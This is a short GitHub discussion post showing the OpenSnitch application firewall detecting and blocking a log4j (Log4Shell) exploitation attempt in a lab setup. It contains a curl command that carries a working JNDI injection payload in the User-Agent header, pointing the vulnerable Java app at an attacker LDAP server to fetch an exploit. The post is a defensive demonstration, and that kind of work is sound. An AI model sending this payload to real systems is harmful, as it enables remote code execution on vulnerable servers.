Detecting and stopping log4j vulnerability with opensnitch #564
gustavo-iniguez-goya
started this conversation in
Show and tell
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
On the server (left):
"Address": "10.168.2.23:50051"
(read more).iptables -t mangle -I FORWARD -m conntrack --ctstate NEW,RELATED -j NFQUEUE --queue-num 0
On the desktop (right):
opensnitch-ui --socket 0.0.0.0:50051
curl -v -H 'User-Agent: ${jndi:ldap://10.168.10.164:443/a}' localhost:8181
Result:
The curl request is sent to the vulnerable java app (1), the java app executes the payload and opens a new connection to the attacker's server (2) to download the exploit (
/a
), and then opensnitch stops the connection and asks to allow or deny it (3).Beta Was this translation helpful? Give feedback.
All reactions